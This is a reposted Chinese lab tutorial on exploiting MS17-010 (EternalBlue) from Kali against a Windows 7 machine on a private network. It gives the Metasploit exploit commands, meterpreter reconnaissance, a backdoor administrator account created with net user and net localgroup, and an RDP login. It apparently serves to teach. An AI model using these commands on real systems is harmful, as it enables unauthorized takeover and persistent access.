永恒:蓝ms17010漏洞

安名然

2024-02-24 帮助5人

1.启动msf

2.检查msf库里是否存在ms17-010漏洞

3.扫描靶机开放端口

4.配置目标ip，本地ip并利用exploit进行攻击

5.查看靶机系统信息、用户身份并对远程主机当前屏幕截图

6.获得shell控制台进cmd操作，添加账户提升权限

7.远程登录靶机

8.输入添加的账户密码，登录成功

环境：

攻击机：kali  192.168.10.2           靶机：win7  192.168.10.3

1.启动msf

# msfconsole

2.检查msf库里是否存在ms17-010漏洞

msf6 > search ms17

学新通

3.扫描靶机开放端口

# nmap -sV 192.168.10.3

学新通

4.配置目标ip，本地ip并利用exploit进行攻击

msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.10.3
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.10.2
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

学新通

5.查看靶机系统信息、用户身份并对远程主机当前屏幕截图

meterpreter > sysinfo
meterpreter > getuid
meterpreter > screenshot

学新通

6.获得shell控制台进cmd操作，添加账户提升权限

meterpreter > shell
C:\Windows\system32>net user lql 123456 /add
C:\Windows\system32>net localgroup Administrators lql /add

学新通

7.远程登录靶机

# rdesktop 192.168.10.3:3389

学新通

8.输入添加的账户密码，登录成功

学新通

这篇好文章是转载于：学新通技术网

永恒:蓝ms17010漏洞

1.启动msf

2.检查msf库里是否存在ms17-010漏洞

3.扫描靶机开放端口

4.配置目标ip，本地ip并利用exploit进行攻击

5.查看靶机系统信息、用户身份并对远程主机当前屏幕截图

6.获得shell控制台进cmd操作，添加账户提升权限

7.远程登录靶机

8.输入添加的账户密码，登录成功

photoshop保存的图片太大微信发不了怎么办

《学习通》视频自动暂停处理方法

Android 11 保存文件到外部存储，并分享文件

word里面弄一个表格后上面的标题会跑到下面怎么办

photoshop扩展功能面板显示灰色怎么办

微信公众号没有声音提示怎么办

excel下划线不显示怎么办

excel打印预览压线压字怎么办

TikTok加速器哪个好免费的TK加速器推荐

怎样阻止微信小程序自动打开